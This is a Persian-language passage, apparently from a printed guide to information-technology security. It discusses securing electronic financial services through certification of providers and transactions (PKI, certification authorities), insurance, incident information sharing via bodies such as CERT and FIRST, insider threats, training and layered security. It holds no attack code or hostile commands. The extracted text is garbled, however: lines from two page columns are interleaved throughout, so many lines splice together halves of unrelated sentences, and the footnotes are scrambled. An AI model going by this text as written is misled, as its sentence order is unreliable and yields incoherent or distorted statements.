‫ﮔﻮﺍﻫﻲ ﺍﻗـﺪﺍﻡ ﻛﻨﻨـﺪ‪ .‬ﺩﻭ ﻋﻨـﻮﺍﻥ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺑـﻪ ﺁﻧﻬـﺎ‬ ‫ﻭﻟﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ‪ ،‬ﺻﻨﻌﺖ ﺑﻴﻤﻪ ﺑﺎﻳـﺪ ﺍﻃﻼﻋـﺎﺕ ﺑﻴـﺸﺘﺮﻱ‬
‫ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ‬ ‫ﺩﺭﺑﺎﺭﺓ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻧﻬﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻋﻨﺎﺻﺮ ﻫﺮ ﺗﺮﺍﻛﻨﺶ‪.‬‬ ‫ﻲ ﺍﻳﻦ ﻧﻮﻉ‬‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﺩﺭ ﺗﺠﺎﺭﺏ ﺛﺒﺖﺷﺪﺓ ﻛﻨﻮﻧ ﹺ‬
‫ﺑﻴﻤﻪ‪ ،‬ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳـﺪﻱ ﻛـﻪ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺑـﺮﺍﻱ‬
‫ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻣﻮﺭ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩﺍﻧﺪ ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﻧـﺸﺪﻩ ﺍﺳـﺖ‪ .‬ﺍﺭﺍﺋـﻪ‪-‬‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛﻪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ‪ ،‬ﻓﺮﻭﺷﻨﺪﮔﺎﻧﻲ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ‬
‫ﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﻴﻤﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻟﺰﺍﻡ ﻛﻨﻨﺪ ﻛـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬
‫ﺑﺮ ﺳﻴﺴﺘﻢ ﭘﺮﺩﺍﺧﺖ ﺗﺄﺛﻴﺮ ﺩﺍﺭﻧﺪ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﻛﺴﺐ ﻣﺠﻮﺯ ﻧﻤﺎﻳﻨـﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﻓﻨﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺷﻨﺎﺳـﺎﻳﻲ ﺷـﻮﻧﺪ ﻭ‬
‫ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻟﺰﺍﻡ ﺻـﻨﻌﺖ ﺑـﻪ ﺗﺄﻳﻴـﺪ ﻭ ﺍﻋﻄـﺎﻱ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ؛ ﺗﺎ ﭘﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﻣﺠﺒﻮﺭ ﺑـﻪ ﺗﺒﻌﻴـﺖ ﺍﺯ‬

‫‪42‬‬ ‫‪Certification‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٣٤‬‬

‫ﺭﻛﻦ ﺷﺸﻢ‪:‬‬ ‫ﮔﻮﺍﻫﻲ ﺑﻪ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﺎﺷـﺪ‪.‬‬


‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﺧﻴﺮﹰﺍ ﺩﺭ ﺻﻨﻌﺖ ﺍﻣﻨﻴﺖ ﻳﻚ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ‬
‫ﺩﻗﺖ ﺩﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪،‬‬
‫"ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺖ" ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺣﻘﻴﻘـﺖ ﺩﺭ ﺍﺛـﺮ ﺍﻳـﻦ‬
‫ﻭ ﻫﻤﻜﺎﺭﻱ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ‬ ‫ﺍﺗﻔﺎﻕ‪ ،‬ﺑﺎ ﺗﻬﻴﺔ ﻳﻚ ﺳﺎﺧﺘﺎﺭ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮﺍﻱ ﻣﺼﺮﻑﻛﻨﻨـﺪﻩ‪،‬‬
‫ﻓﻘﺪﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺩﻗﻴﻖ ﺩﺭﺑﺎﺭﺓ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬ ‫ﻣﺴﺆﻟﻴﺖﭘﺬﻳﺮﻱ ﻣﻴـﺎﻥ ﺻـﻨﻌﺖ ﻭ ﻣﺘﺨﺼـﺼﻴﻦ ﺁﻥ‪ ،‬ﻭ ﺗﻔﻜﻴـﻚ‬
‫ﻧﺘﻴﺠــﺔ ﺩﺍﻧــﺶ ﻳــﺎ ﺍﻧﮕﻴــﺰﺓ ﻛــﻢ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ‪ ،‬ﺍﻧــﺪﺍﺯﻩﮔﻴــﺮﻱ ﻭ‬ ‫ﻦ ﺗﺄﻳﻴﺪﺷﺪﻩ ﺍﺯ ﻛﺴﺎﻧﻴﻜﻪ ﺧﻮﺩ ﺭﺍ ﻣﺘﺨﺼﺺ ﻣﻲﺩﺍﻧﻨـﺪ‪،‬‬ ‫ﻣﺘﺨﺼﺼﻴ ﹺ‬
‫ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔــﺬﺍﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺍﺳــﺖ‪ .‬ﺑــﺎ ﮔــﺴﺘﺮﺵ ﺗــﺪﺍﺭﻛﺎﺕ‬ ‫ﺍﻳﻦ ﺗﻤﺎﻡ ﺻﻨﻌﺖ ﺍﺳﺖ ﻛﻪ ﺳﻮﺩ ﻣﻲﺑـﺮﺩ‪ .‬ﺍﻳـﻦ ﺭﻭﺵ ﻫﻤﭽﻨـﻴﻦ‬
‫ﺩﺭﻭﻥﻣـﺮﺯﻱ ﻭ ﺑــﺮﻭﻥﻣــﺮﺯﻱ ﺑــﻪ ﻣﻨﻈــﻮﺭ ﺗــﺴﻬﻴﻞ ﺩﺭ ﺍﺷــﺘﺮﺍﻙ‬ ‫ﻭﺿﻌﻴﺖ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻪ ﻭﺿﻌﻴﺖ ﻳﻚ ﺣـﻮﺯﺓ ﺣﺮﻓـﻪﺍﻱ ﺍﺭﺗﻘـﺎ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﻗﻴﻖ ﺩﺭﺑـﺎﺭﺓ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ‪ ،‬ﺳـﺮﻗﺖ‪،‬‬ ‫ﻣﻲﺩﻫﺪ ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺻﻨﻌﺖ ﺍﻧﮕﻴـﺰﺓ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺗـﺪﻭﻳﻦ ﻭ‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﻏﻴﺮﻩ ﺗﻮﺳﻂ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‪ ،‬ﺍﻣﻨﻴﺖ‬ ‫ﺍﻋﻤﺎﻝ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺗﻘﻮﻳﺖ ﺧﻮﺍﻫﺪ ﺷـﺪ‪ .‬ﺑـﻪﺍﺷـﺘﺮﺍﻙ‬ ‫ﺣﻮﺯﺓ ﺑﻌﺪﻱ ﻛﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﻣﻼﺣﻈـﻪ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﮔـﻮﺍﻫﻲﻫـﺎﻱ‬
‫ﻧﮕﺬﺍﺷﺘﻦ ﺍﻃﻼﻋﺎﺕ ﻧﻪ ﺗﻨﻬﺎ ﺩﺍﻧﺶ ﺭﺍ ﺩﺭ ﻳﻚ ﺳﻄﺢ ﻣﻌـﻴﻦ ﻧﮕـﻪ‬ ‫ﻋﻨﺎﺻﺮ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻠﻪ ﻧﻈﻴﺮ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳـﺖ‪ .‬ﮔـﻮﺍﻫﻲ‬
‫ﻣﻲﺩﺍﺭﺩ‪ ،‬ﺑﻠﻜﻪ ﺍﺯ ﺁﻥ ﻣﻬﻤﺘﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻌﺔ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﺑﺨـﺶ‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺭﺯﺵ ﻳﻚ ﻣﻌﺎﻣﻠﻪ ﺭﺍ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﭼﻪ ﻛـﺴﻲ ﻭ ﭼـﻪ‬
‫ﺧــﺼﻮﺻﻲ )ﺷــﺎﻣﻞ ﺑﻴﻤــﻪ( ﺭﺍ ﻧﻴــﺰ ﻣﺤــﺪﻭﺩ ﻧﻤﺎﻳــﺪ‪ .‬ﺍﻳــﻦ ﻓﻘــﺪﺍﻥ‬ ‫ﭼﻴﺰﻱ ﺁﻧﺮﺍ ﮔﻮﺍﻫﻲ ﻛﺮﺩﻩ ﺍﻓﺰﺍﻳﺶ ﺩﻫـﺪ‪ .‬ﮔـﻮﺍﻫﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺍﻓﺰﺍﻳﺶ ﻫﺰﻳﻨـﺔ ﺑﻴﻤـﺔ ﺷـﺮﻛﺘﻬﺎ ﻭ‬ ‫ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺩﻭﻟﺘﻲ ﻧﻈﻴﺮ ﺍﺩﺍﺭﺓ ﭘﺴﺖ ﻳـﺎ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﻮﺩ‪.‬‬ ‫ﺧﺼﻮﺻﻲ ﻣﺜﻞ ﺑﺎﻧﻚ ﺻﺎﺩﺭ ﺷﻮﺩ‪ .‬ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‪ ،‬ﻣـﺴﺎﺋﻞ‬
‫ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧـﺼﻮﺻﻲ‬ ‫ﺳــﺎﺧﺘﺎﺭﻱ ﻭ ﻣــﺪﻳﺮﻳﺘﻲ ﺧــﺎﺹ ﺧــﻮﺩ ﺭﺍ ﺩﺍﺭﻧــﺪ‪ .‬ﺩﺭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻻﺯﻡ ﺍﺳــﺖ‪ .‬ﺑــﺮﺍﻱ ﻣﺜــﺎﻝ ﻛﻤﻴﺘــﺔ ﺭﺍﻫﺒــﺮﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﺍﻣﻨﻴــﺖ ﻭ‬ ‫ﻛــﺸﻮﺭﻫﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺷــﺮﻛﺘﻬﺎﻱ ﺧــﺼﻮﺻﻲ ﺑــﺮﺍﻱ ﺗﻬﻴــﺔ‬
‫ﻣﺨﺎﻃﺮﺓ ‪ ٤٥BIST‬ﺑﺎ ﺍﻳﺠﺎﺩ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ﺍﻣﻨﻴـﺖ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‪،‬‬ ‫ﻲ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﺑﻬﺘﺮ ﻋﻤﻞ‬ ‫ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺗ ﹺ‬
‫ﻣﻮﺿﻮﻋﺎﺗﻲ ﭼﻮﻥ ﺍﻣﻨﻴﺖ‪ ،‬ﺳﻼﻣﺖ ﻭ ﺻﺤﺖ ﭘﺮﺩﺍﺧﺘﻬﺎ ‪ ،‬ﺗﺠـﺎﺭﺕ‬ ‫ﻛﻨﻨﺪ‪.‬‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻭ ﻓﻨﺎﻭﺭﻳﻬــﺎﻱ ﻣﺮﺑﻮﻃــﻪ ﺭﺍ ﻣــﻮﺭﺩ ﺑﺮﺭﺳــﻲ ﻗــﺮﺍﺭ‬ ‫ﻋﻨﺼﺮ ﺍﺻﻠﻲ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﻮﻓﻖ ﺑﺮﺍﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﺍﻳﻦ ﺍﺳـﺖ‬
‫ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳـﻦ ﺁﺯﻣﺎﻳـﺸﮕﺎﻩ ﻫﻤﭽﻨـﻴﻦ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺩﺭﺑـﺎﺭﺓ‬ ‫ﻛﻪ ﺳﺎﺧﺘﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻣﺮﺍﻛﺰ ﻗﻀﺎﻳﻲ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺑﺎﻳـﺪ‬
‫ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺗﺴﻬﻴﻞ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﻛﻠﻴﺔ ﺗﺮﺍﻛﻨﺸﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻭﺟﻮﺩ ﺍﺗﺤﺎﺩ ﺍﻣﻨﻴﺖ ﺍﻳﻨﺘﺮﻧـﺖ‪ ،٤٦‬ﺗﻴﻤﻬـﺎﻱ ﺍﻣﻨﻴـﺖ‬ ‫ﻭ ﺣﺪﻭﺩ ﺍﺧﺘﻴﺎﺭﺍﺕ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻳﻚ ﺗﺄﻳﻴﺪﻛﻨﻨﺪﻩ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤـﺎﻡ‬
‫ﺭﺧــﺪﺍﺩ ﻭ ﻭﺍﻛــﻨﺶ‪ ،٤٧‬ﻭ ﻣﺮﻛــﺰ ﻓﻮﺭﻳﺘﻬــﺎﻱ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ‬ ‫ﺣﻮﺯﻩﻫﺎﻱ ﻗﻀﺎﻳﻲ ﻳﻜﭙﺎﺭﭼﻪ ﻭ ﺟﺎﻣﻊ ﺑﺎﺷﺪ‪.‬‬
‫)‪ ٤٨(CERT‬ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻫﻤﻜـﺎﺭﻱ‬ ‫ﺍﮔﺮﭼﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ )‪ ٤٣(PKI‬ﻭ‬
‫ﻣﺘﻘﺎﺑﻞ ﺑﺎﻋﺚ ﺍﺷﺘﺮﺍﻙ ﻓﺰﺍﻳﻨﺪﺓ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﻣﺠﺮﻳﺎﻥ ﻗﺎﻧﻮﻥ ﻭ‬ ‫ﻻ ﺑﻌﻨﻮﺍﻥ ﺗﻨﻬﺎ ﺭﺍﻫﻬﺎﻱ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ ﺑـﺮﺍﻱ‬
‫ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣـﻲﺷـﻮﺩ‪ .‬ﻳـﻚ‬ ‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻟﻴﻜﻦ ﺗﻮﺟﻪ ﺑﻪ ﻫﺰﻳﻨﻪﻫﺎ ﻭ‬
‫ﻋﻨﺼﺮ ﻣﺸﺘﺮﻙ ﺩﺭ ﺗﻤﺎﻡ ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﻋﺎﻳـﺖ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﻭ‬ ‫ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﭘﻴﭽﻴﺪﻩ ﻭ ﺩﺭﻫﻢ ‪ PKI‬ﻭ ﻧﺎﺳﺎﺯﮔﺎﺭﻳﻬﺎﻱ ﺣﻘـﻮﻗﻲ ﺁﻥ‬
‫ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ‪ :‬ﻣﺠﺮﻳﺎﻥ ﻗﺎﻧﻮﻥ ﻭ ﻣﺆﺳﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ‪ ،‬ﻫﻮﻳﺖ ﻣﻨﺎﺑﻊ‬ ‫ﺑﺎ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ )‪ ٤٤(CAs‬ﻧﻴﺰ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﻳﻚ ﺭﺍﻩﺣﻞ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﻗﻴﻖ ﺧﻮﺩ ﺭﺍ ﻓﺎﺵ ﻧﻤﻲﻛﻨﻨـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﻧﻘـﺶ‬ ‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻣﻌﻘـﻮﻝ ﻭ ﻣﻨﺎﺳـﺐ ﺑﺎﺷـﺪ ﺑﺎﻳـﺪ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﭼﻨﺪﺟﺎﻧﺒﻪ ﺩﺭ ﺗﺴﻬﻴﻞ ﻫﻤﻜﺎﺭﻱ ﻧﻴﺎﺯ ﺑﻪ ﺑﺮﺭﺳﻲ ﺩﺍﺭﺩ‪.‬‬ ‫ﻣﺮﺯﻫﺎﻳﻲ ﭼﻮﻥ ﺍﻋﺘﻤﺎﺩ ﻭ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺑﺎﺷﺪ ﻭ ﺍﻳﻦ‬
‫ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﭼﻪ ﺍﻗﺘﺼﺎﺩ ﻣﻨﺴﺠﻢﺗﺮ ﺷﻮﺩ‪ ،‬ﺑﻪ ﻧﺤﻮ ﺍﺣﺴﻦ‬ ‫ﭼﻨﺪﺍﻥ ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺁﻥ ﻛـﺪﺍﻡ ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬
‫‪45‬‬ ‫‪BIST's Security and Risk Assessment‬‬
‫‪Steering Committee‬‬
‫‪46‬‬ ‫‪Internet Security Alliance‬‬
‫‪47‬‬ ‫‪Forum of Incident and Response Security‬‬
‫‪Teams‬‬ ‫‪43‬‬ ‫‪Public Key Infrastructure‬‬
‫‪48‬‬ ‫‪Computer Emergency Response Team‬‬ ‫‪44‬‬ ‫‪Certification Authorities‬‬
‫‪١٣٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻧﻈﺎﺭﺗﻲ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﻧـﻮﻳﻦ ﺑـﺎ ﺍﺑﺰﺍﺭﻫـﺎﻳﻲ‬ ‫ﺍﻧﺠﺎﻡﺷﺪﻥ ﻣﺴﺌﻮﻟﻴﺖ ﻫﺮ ﺑﺨﺶ ﺍﻫﻤﻴﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ؛ ﻭ‬
‫ﻧﻈﻴﺮ ﻃﺮﺣﻬﺎﻱ ﺗﺒﺎﺩﻝ ﻓﻌﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﻛﺎﺭﻛﻨﺎﻥ؛‬ ‫ﻲ ﺍﻣـﺮﻭﺯ‪ ،‬ﺩﺭ ﺁﻏـﺎﺯ‬
‫ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺻـﻨﻌﺖ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟ ﹺ‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻤﺮﻛﺰ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩ ﻭ ﺗﻐﻴﻴـﺮﺍﺕ‬
‫ﻃﺮﺍﺣﻲ ﺩﻭﺭﻩﻫﺎﻱ ﻣﺘﻤﺮﻛﺰ ﺑـﺮﺍﻱ ﻣﻤﺘﺤﻨـﺎﻥ ﺑـﺎ ﻛﻤـﻚ‬ ‫•‬
‫ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺩﻫﺔ ﮔﺬﺷـﺘﻪ ﺑـﻮﺩ ﻛـﻪ ﻭﺍﺑـﺴﺘﮕﻴﻬﺎﻱ ﺩﺭﻭﻧـﻲ ﺍﻳـﻦ‬
‫ﻣﺆﺳــﺴﻪ ﭘﺎﻳــﺪﺍﺭﻱ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ‪ ٥١‬ﻳــﺎ ﺩﻳﮕــﺮ ﻣﺮﺍﻛــﺰ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍ ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﻭ ﺑﻴﺸﺘﺮ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺁﻣﻮﺯﺷﻲ؛‬
‫ﺗﺪﻭﻳﻦ ﻳﻚ ﻃﺮﺡ ﭼﻨﺪﻣﻨﻈﻮﺭﺓ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺮﺍﻱ ﺁﻣـﻮﺯﺵ‬ ‫•‬ ‫ﺭﻛﻦ ﻫﻔﺘﻢ‪:‬‬
‫ﻣﺘﺨﺼﺼﻴﻦ ﺁﻳﻨﺪﺓ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻭ ﺑﻄﻮﺭ ﻫﻤﺰﻣـﺎﻥ‬
‫ﺁﻣﻮﺯﺵ ﻭ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ‬
‫ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺩﺍﻧﺶ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ‪.‬‬
‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺭﻛﻦ ﻫﺸﺘﻢ‪:‬‬ ‫ﺗﺤﻠﻴﻞ ﺁﻣﺎﺭﻱ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺑﻴﺶ ﺍﺯ‬
‫ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ‬ ‫‪ %۵۰‬ﺣﻤﻼﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ‬
‫ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺑﺎ ﺗﺤﺼﻴﻼﺕ ﻛـﻢ‬
‫ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺍﺟﺰﺍﻱ ﺑﻨﻴﺎﺩﻱ ﻳﻚ‬
‫ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤـﻼﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺁﺳـﻴﺐﭘـﺬﻳﺮﺗﺮ ﺍﺳـﺖ‪ .‬ﺑـﺮﻋﻜﺲ‪،‬‬
